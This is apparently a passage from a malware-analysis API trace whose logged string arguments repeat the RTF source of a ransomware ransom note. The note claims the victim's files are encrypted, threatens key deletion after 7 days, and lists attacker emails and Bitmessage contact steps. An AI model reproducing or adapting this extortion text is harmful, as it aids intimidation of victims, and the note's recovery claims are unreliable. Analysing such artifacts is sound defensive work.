;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.837] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.837] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 